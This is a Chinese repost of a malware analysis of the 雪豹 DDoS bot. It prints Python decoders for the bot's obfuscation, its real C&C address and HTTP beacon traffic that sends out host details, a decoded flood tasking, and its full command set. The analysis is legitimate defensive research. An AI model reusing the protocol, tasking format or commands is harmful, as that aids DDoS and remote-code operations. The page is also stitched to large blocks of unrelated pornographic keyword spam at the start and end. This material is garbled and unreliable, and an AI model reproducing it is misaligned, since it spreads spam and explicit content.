精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Arbor成功攔截雪豹病毒

安全
@malpush把Tweet中的木馬雪豹暴露到了我們Arbor的無線電探測器中,此次的木馬表現是在Tweet中顯示一個網址,當你填入信息后,他會通往一個指令和控制面板.

@malpush把Tweet中的木馬雪豹暴露到了我們Arbor的無線電探測器中,此次的木馬表現是在Tweet中顯示一個網址,當你填入信息后,他會通往一個指令和控制面板(C&C)如下所示:

Arbor成功攔截雪豹病毒

這一現象使我深信我應更深入地了解雪豹。巧合的是對于Arbor來說,這一惡意程序結果竟是DDos(分布式拒絕服務攻擊)僵尸程序。

惡意程序樣例

分析研究樣例可以在malwr查找到 (MD5: 4fa91b76294d849d01655ffb72b30981)。

這是用Delphi編寫的惡意軟件包括以下幾種形式: UPX填充,字符串模糊處理,反病毒機器,反調試,自我修改代碼,過程挖空。

這種基于Delphi的使用和使用的面板部分的語言,很可能是起源于俄羅斯。

模糊處理

木馬雪豹使用兩種模糊處理方式;它們是 base64 和 XOR的聯合。不同秘鑰使用不同的部分。第一個模糊處理方式是用在字符串上,可以用下面的Python函數可以解碼:

def decrypt_strings(msg, key): msg_no_b64 = base64.b64decode(msg) plain_buf = [] for i in range(len(msg_no_b64)): key_lsb = ord(key[i % len(key)]) & 0xf msg_lsb = ord(msg_no_b64[i]) & 0xf c = msg_lsb ^ key_lsb d = c ^ 0xa msg_slsb = ord(msg_no_b64[i]) & 0xf0 plain_byte = msg_slsb ^ d plain_buf.append(chr(plain_byte)) return "".join(plain_buf)

下面是一些例子:

>>> decrypt_strings("QG1wZ2xnPj4sZGNk", "12xc3qwfhjeryTTYHH") 'Kernel32.dll' >>> decrypt_strings("TG12RGZveGBnSG5mZ2JrQg==", "12xc3qwfhjeryTTYHH") 'GetModuleHandleA' >>> decrypt_strings("dWpkbXFqZmxi", "mu#X") 'removeone' >>> decrypt_strings("cn9tY3Nqf2d1", "mu#X") 'updatever' >>> decrypt_strings("ZXN8djotITgyOyQ0MD4mOD45Jzc5I2NmfS1kaXhzdCx+YXo=", "GMrlZ8t3pypO3423423LpFqCUx") 'http://188.190.101.13/hor/input.php'

第二種方法主要用在C&C通信上,并且可按照下面Python函數清理:

def decrypt_cnc(msg, key): msg_no_b64 = base64.b64decode(msg) plain_buf = [] for offset, enc_byte in enumerate(msg_no_b64): plain_byte = ord(enc_byte) ^ ord(key[offset % len(key)]) plain_buf.append(chr(plain_byte)) return "".join(plain_buf)

下面是一些例子:

>>> decrypt_cnc("ChYJCRhta3k=", "\x38") '2.11 USA' >>> decrypt_cnc("DRhAAA4YeRgIXBgIUBgPVRgKAEs=", "\x38") '5 x86 A 0d 0h 7m 28s'

指令與控制

C&C是基于HTTP(超文本轉移協議)。兩種信息類型已經被識別出來了。第一種信息類型o或者是“背景連線通訊”就像這樣:

POST /hor/input.php HTTP/1.0 Host: 188.190.101.13 User-Agent: Mozilla Gecko Firefox 25 Accept: text/plain Accept-Encoding: identity Accept-Language: en-EN,en Connection: Close Referer: http://mhome.br Content-Length: 106 Content-Type: application/x-www-form-urlencoded m=CA==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=&p=cHd1fQ==&v=ChYJCRhta3k=&s=DRhAAA4YeRgIXBgIUBgPVRgKAEs=

這就是它如何被解碼的:

m=0&h=18803769021711750776216376939&p=HOME&v=2.11 USA&s=5 x86 A 0d 0h 7m 28s

它的POST參數是:

· m – Message type (0)

· h – Hash based on computer name

· p – Computer name

· v – Version and locale

· s – Windows version, architecture, user type, and uptime

背景連線通訊反應如下方:

HTTP/1.1 200 OK Date: Wed, 04 Dec 2013 14:48:27 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Content-Length: 32 Connection: close Content-Type: text/html; charset=UTF-8 dVdCUVRUWRh/XVtTVxh+UUpdXldAGAoN

被解碼,這是在請求中使用的用戶代理

>>> decrypt_cnc("dVdCUVRUWRh/XVtTVxh+UUpdXldAGAoN", "\x38") 'Mozilla Gecko Firefox 25'

第二種信息類型是1或者“指令調查”。 如下方:

POST /hor/input.php HTTP/1.0 Host: 188.190.101.13 User-Agent: Mozilla Gecko Firefox 25 Accept: text/plain Accept-Encoding: identity Accept-Language: en-EN,en Connection: Close Referer: http://udot.tk Content-Length: 49 Content-Type: application/x-www-form-urlencoded m=CQ==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=

被解碼為:

m=1&h=18803769021711750776216376939

它的POST參數是:

· m – Message type (1)

· h – Hash based on computer name

調查反應樣例:

HTTP/1.1 200 OK Date: Wed, 04 Dec 2013 12:56:16 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Content-Length: 72 Connection: close Content-Type: text/html; charset=UTF-8 UExMSF5UV1dcElBMTEgCFxdMWUpfXUwWVl1MF1FWXF1AFkhQSBcSAAgSCQ0IEgg=

被解碼:

decrypt_cnc("UExMSF5UV1dcElBMTEgCFxdMWUpfXUwWVl1MF1FWXF1AFkhQSBcSAAgSCQ0IEgg=", "\x38") 'httpflood*http://target.net/index.php/*80*150*0'

指令被多個“*”限定,如下面格式:

command*arg1*arg2*arg3*arg4*arg5*arg6*arg7

指令

下面的bot(網絡爬蟲)指令已被識別:

· httpflood – HTTP GET flood

· httppost – HTTP POST flood

· udpflood – UDP flood

· synflood – TCP connect flood

· tcpflood – TCP flood

· download – download and execute (all bots)

· downloadone – download and execute (specified bot)

· update – update (all bots)

· updateos – update (specified OS)

· updateone – update (specified bot)

· updatever – update (specified version)

· removeos – remove bot (specified OS)

· removeone – remove bot (specified bot)

· s! – stop all floods

· su – stop UDP flood

· sh – stop HTTP flood

· ss – stop TCP SYN flood

· st – stop TCP flood

關于每個指令的更多信息,可在C&C面板內的“任務管理”一欄查找到。

Arbor成功攔截雪豹病毒

Arbor成功攔截雪豹病毒

注意:我在分析的二進制里看不到任何關于“memexec”或者“script”指令的引用。

指令和控制面板

總結起來,這便是指令和控制面板幕后的行程;“靜態/指數”頁面:

Arbor成功攔截雪豹病毒

這便是“上傳”頁面:

Arbor成功攔截雪豹病毒

部分“Bot清單”頁面:

Arbor成功攔截雪豹病毒

結論:

該篇分析了crypto(加密),C&C基礎設施,與木馬指令臺。雪豹——一個新的DDoS bot(網絡爬蟲)程序很可能來自于俄羅斯。在寫入的同時,僅有少量的獨特樣例與C&C服務器已經被識別了,那么這項新威脅之攻擊規模和影響還有待確定。Arbor安全工程響應小組(ASERT)將會繼續追蹤雪豹病毒。

責任編輯:藍雨淚 來源: 51CTO.com
相關推薦

2009-04-09 11:15:39

2009-11-19 08:51:15

Windows 7系統抄襲

2011-07-11 13:02:24

病毒瑞星安全

2009-09-01 13:03:25

雪豹蘋果操作系統

2012-08-17 18:24:07

2012-07-26 14:06:43

2012-11-03 16:01:18

2009-09-09 08:51:16

Windows 7雪豹圖標

2013-09-13 14:03:14

2012-12-10 12:40:01

2009-08-27 11:59:09

蘋果雪豹Windows 7

2009-05-14 09:23:37

微軟Windows 7操作系統

2009-08-31 10:36:51

蘋果操作系統雪豹評測

2013-01-30 10:46:06

BYODARBOR網絡體系

2017-12-26 10:31:12

QQ軟件騰訊

2012-12-25 19:09:02

2012-08-17 17:07:48

2012-09-06 15:13:48

2009-09-03 16:20:06

雪豹蘋果操作系統
點贊
收藏

51CTO技術棧公眾號

久久精品72免费观看| 天堂精品在线视频| 国产主播一区二区三区| 亚洲欧美制服第一页| 久久久久久久久久久免费视频| 高h视频在线| 韩国视频一区二区| 色视频www在线播放国产成人| 日韩高清在线一区二区| 91破解版在线观看| 亚洲国产精华液网站w| 热久久视久久精品18亚洲精品| 少妇熟女视频一区二区三区| 三区四区在线视频| 国产·精品毛片| 国产精品av电影| 美女100%无挡| 电影网一区二区| 亚洲色图在线视频| 欧美精品亚洲| 亚洲欧美另类综合| 韩国亚洲精品| 一本大道亚洲视频| 天堂中文视频在线| 香蕉视频网站在线观看| 久热成人在线视频| 日韩在线观看精品| 亚洲免费成人在线视频| 另类激情视频| 中文字幕不卡在线观看| 国产伦精品一区二区三区照片 | 亚洲三级在线观看| 91手机视频在线观看| www.色小姐com| 不卡一区2区| 日韩激情av在线免费观看| 久久精品国产99久久99久久久| 50度灰在线| 成人avav影音| 99久久99久久| av黄色在线看| 激情久久久久久久| 亚洲精品之草原avav久久| 成人免费xxxxx在线视频| 欧亚在线中文字幕免费| 国产色一区二区| 国产一区二区在线播放| 强乱中文字幕av一区乱码| 久操成人av| 欧美一区二区三区视频| 欧美这里只有精品| 午夜视频成人| 中文字幕欧美激情一区| 国产精品初高中精品久久| 国产精品爽爽久久| 一区二区三区精品视频在线观看| 欧美国产一区二区三区| 美女的奶胸大爽爽大片| 欧美在线黄色| 亚洲视频在线播放| 三上悠亚影音先锋| 日本久久伊人| 日韩欧美国产wwwww| 日韩一级免费在线观看| 亚洲成人看片| 欧美日韩综合在线免费观看| 国产欧美久久久久| 高h视频在线| 国产精品沙发午睡系列990531| 亚洲7777| 麻豆视频网站在线观看| 综合欧美亚洲日本| 日本天堂免费a| 国产毛片av在线| 懂色av一区二区三区免费观看| 日本最新高清不卡中文字幕| 波多野结衣毛片| 亚洲国产免费| 欧美在线视频观看免费网站| 91午夜精品亚洲一区二区三区| 欧美日本一区二区高清播放视频| 欧美国产精品人人做人人爱| 亚洲一区欧美在线| 日韩福利视频导航| 91大神在线播放精品| 欧美日韩在线视频免费| 红桃视频国产精品| 日本精品久久久久久久| 国产成人精品亚洲男人的天堂| 亚洲少妇一区| 国产日本欧美一区二区三区| 免费观看日批视频| 久久电影网站中文字幕| 成人在线观看91| 噜噜噜噜噜在线视频| 白白色 亚洲乱淫| 日本婷婷久久久久久久久一区二区 | 欧美一区二区观看视频| fc2成人免费视频| 免费观看性欧美大片无片| 亚洲大胆人体av| 97人妻精品一区二区免费| 婷婷综合激情| 久久精品视频在线播放| 99久久99久久精品免费| 午夜精彩国产免费不卡不顿大片| 久久精品国产亚洲7777| 久久久久久久久福利| 国产精品密蕾丝视频下载| 久久精品99久久久香蕉| 日产精品久久久久| 免费高清成人在线| 国产99在线播放| 中国日本在线视频中文字幕| 亚洲成人午夜电影| 久久人人爽av| 中文字幕精品影院| 亚洲欧美另类自拍| 欧美偷拍一区二区三区| 欧美国产91| 欧美精品久久久久久久免费观看| www.亚洲激情| 91美女视频网站| 亚洲精品久久久久久一区二区| av资源在线播放| 欧美一区二区三区性视频| 国产交换配乱淫视频免费| 国产日产精品一区二区三区四区的观看方式| 亚洲精品美女久久| www.色小姐com| 亚洲看片免费| 国产精品va在线播放| 丁香花免费高清完整在线播放| av亚洲精华国产精华| 400部精品国偷自产在线观看| 朝桐光一区二区| 亚洲美女av网站| 国产亚洲精品精品精品| 国产毛片久久| 91精品久久久久久综合乱菊| 国产xxxx孕妇| 中文字幕在线观看一区| 国内少妇毛片视频| 欧美成人a交片免费看| 亚洲激情在线观看| 国产精久久久久久| 成人综合婷婷国产精品久久| 偷拍盗摄高潮叫床对白清晰| 日韩国产91| 久久精品99久久久久久久久| 一区二区三区亚洲视频| 成人免费av资源| 精品国产av无码一区二区三区| 中文字幕乱码中文乱码51精品| 亚洲а∨天堂久久精品9966| 日本黄区免费视频观看| 亚洲一级一区| 激情五月综合色婷婷一区二区| 国产后进白嫩翘臀在线观看视频| 色婷婷精品大视频在线蜜桃视频| 伊人精品视频在线观看| 视频一区在线观看| 欧美大片在线影院| 波多野结衣在线电影| 久久久久久亚洲综合| 日韩人妻一区二区三区蜜桃视频| 国产精品99久久免费| 一区二区欧美日韩视频| 国产天堂第一区| 99在线精品免费| 日韩精品视频久久| 都市激情亚洲欧美| 91精品国产沙发| 高清中文字幕一区二区三区| 欧美日韩国产在线播放| 人人妻人人藻人人爽欧美一区| 欧美久久视频| 国产日韩综合一区二区性色av| 欧美色综合一区二区三区| 夜夜揉揉日日人人青青一国产精品 | 91香蕉视频在线播放| 国产高清无密码一区二区三区| 视频在线精品一区| 国产精品亚洲四区在线观看| 欧美风情在线观看| 国产高清视频免费| 国产精品国产馆在线真实露脸| 伊人成人免费视频| 99精品视频免费观看| 亚洲国产精品一区二区第四页av| 亚洲欧美在线人成swag| 国色天香2019中文字幕在线观看| 蜜桃免费在线| 日韩一区二区中文字幕| 成人毛片18女人毛片| 中文字幕在线观看不卡| 精品999在线| 欧美日韩激情| 亚洲在线免费看| 国产cdts系列另类在线观看| 日韩www在线| 国产精品视频一二区| 欧美性极品xxxx做受| 日韩在线不卡av| 精品无人码麻豆乱码1区2区| 亚洲熟妇国产熟妇肥婆| 欧美性生活一级片| 91色中文字幕| 18在线观看的| 精品少妇一区二区三区视频免付费| 九九热最新地址| 国产乱子伦一区二区三区国色天香| 一本久道久久综合狠狠爱亚洲精品 | 欧美午夜女人视频在线| www.av视频| 日本一二三四高清不卡| 国产老熟女伦老熟妇露脸| 极品美女销魂一区二区三区免费| 日韩在线综合网| 欧美私人啪啪vps| 亚洲一区高清| 色综合中文网| 精品国产一区二区三区日日嗨| 麻豆视频在线看| 国产亚洲精品一区二区| 亚洲免费视频二区| 天天影视涩香欲综合网| 久久免费看少妇高潮v片特黄| 国产欧美日韩亚州综合 | 久久99精品久久久久久琪琪 | 国产欧美精品区一区二区三区| 北京富婆泄欲对白| 国产成人自拍在线| 男人午夜视频在线观看| 免费看黄色91| 欧美私人情侣网站| 亚洲成av人片一区二区密柚| 日本最新一区二区三区视频观看| 乱中年女人伦av一区二区| 99re国产| 桃色一区二区| 69av成年福利视频| 日韩毛片久久久| 影音先锋欧美精品| 成人在线免费公开观看视频| 亚洲精品在线不卡| 欧美色图另类| 亚洲新声在线观看| www天堂在线| 欧美一区二区黄色| www.午夜激情| 精品国产免费人成在线观看| 中文字幕 视频一区| 一区二区三区蜜桃| 青青草原在线免费观看| 国产网站一区二区三区| 全黄一级裸体片| 国产成人av一区二区三区在线观看| 各处沟厕大尺度偷拍女厕嘘嘘| 最新成人av网站| 精品久久久久久久久久中文字幕| 99久久综合狠狠综合久久aⅴ| 亚洲精品影院| 亚洲国产欧美日韩在线观看第一区 | 香蕉人人精品| 欧美精品免费观看二区| 久久不见久久见免费视频7| 91亚色免费| 国产精品nxnn| 91久久精品日日躁夜夜躁国产| 中文字幕 在线观看| 久久久久久久97| 欧美办公室脚交xxxx| 欧美高清视频免费观看| 国产乱码午夜在线视频| 国产xxx69麻豆国语对白| 国产91在线播放精品| 92国产精品久久久久首页| jvid一区二区三区| 国产中文欧美精品| 99re8这里有精品热视频8在线| 国产一区二区精品免费| 国产一区国产二区国产三区| 国产伦精品一区二区三区视频免费 | 777色狠狠一区二区三区| 亚洲av无码乱码国产精品| 亚洲精品美女在线观看| 丰满人妻熟女aⅴ一区| 亚洲精品影视在线观看| 麻豆影院在线观看| 97视频免费在线观看| 成人一区视频| 国产精品一区二区三区精品| 一区中文字幕电影| 久久久99爱| 亚洲国产精品成人| 北条麻妃在线视频观看| 精品中文av资源站在线观看| 手机av在线免费| www.日韩大片| 999精品视频在线观看播放| 天天综合天天做天天综合| 最近中文字幕av| 欧美亚洲丝袜传媒另类| 无码人妻精品一区二区三区不卡 | 美女少妇全过程你懂的久久| 国产麻豆一区二区三区在线观看| 国产伦精品一区二区三区免费优势| 欧美性bbwbbwbbwhd| 欧美三级网页| 亚洲色图 在线视频| 美女爽到高潮91| 天堂在线中文在线| 91在线视频在线| 69av.com| 欧美精品第1页| 国产在线观看黄| 韩国精品久久久999| 国产精品白丝久久av网站| 91中文精品字幕在线视频| 国产精品欧美在线观看| 青青草成人免费在线视频| 国产一区二区视频在线| 九九九视频在线观看| 精品久久久视频| 好吊色一区二区三区| 日韩av在线导航| 国产日韩精品在线看| 97久久伊人激情网| 欧美影视资讯| 欧美日韩另类综合| 亚洲毛片一区| 95视频在线观看| 国产日韩视频一区二区三区| 我要看黄色一级片| 欧美日韩国产区一| 亚洲精品国产精品乱码不卡| 日韩精品在线免费| www在线看| 国产精品吊钟奶在线| 成人豆花视频| 精品乱码一区二区三区| 日韩在线不卡| 精品久久久久久无码中文野结衣| 西西裸体人体做爰大胆久久久| 折磨小男生性器羞耻的故事| 日本一区二区视频在线| 日韩一区二区三区四区在线| 91精品欧美久久久久久动漫| 色窝窝无码一区二区三区| 中文字幕视频一区二区在线有码| 男女视频在线| 成人欧美一区二区三区黑人免费| 香蕉视频官网在线观看日本一区二区| 天天色综合社区| 中文字幕一区免费在线观看| 在线免费观看一区二区| 北条麻妃久久精品| 亚洲国产欧美日本视频| 91免费福利视频| 欧美日韩第一区| 亚洲无人区码一码二码三码| 午夜久久久久久久久| 日本午夜在线| 国产精品男人爽免费视频1| 成人精品视频| 天堂av手机在线| 一区二区三区在线观看欧美| 日韩中文字幕免费观看| 2019精品视频| 精品国精品国产自在久国产应用| 国产野外作爱视频播放| 亚洲人成电影网站色mp4| 国产成人麻豆免费观看| 色综合伊人色综合网站| 精品国产亚洲一区二区三区大结局| www国产免费| 另类的小说在线视频另类成人小视频在线 | 久久av网站| 欧美日韩性生活片| 国产女同性恋一区二区| 99久久免费国产精精品| 中日韩午夜理伦电影免费| 成人av在线播放| 一级黄色免费在线观看| 国产91色综合久久免费分享| 精品91久久久| 日韩在线视频观看| 成人另类视频| 九热视频在线观看| 亚洲黄色片在线观看| 激情综合闲人网| av在线不卡观看| 日韩精品五月天| 久久久久久久蜜桃| 亚洲天堂av在线免费观看| 免费看日产一区二区三区| 日本在线观看a| 一区二区三区精品视频在线| 国产av一区二区三区精品|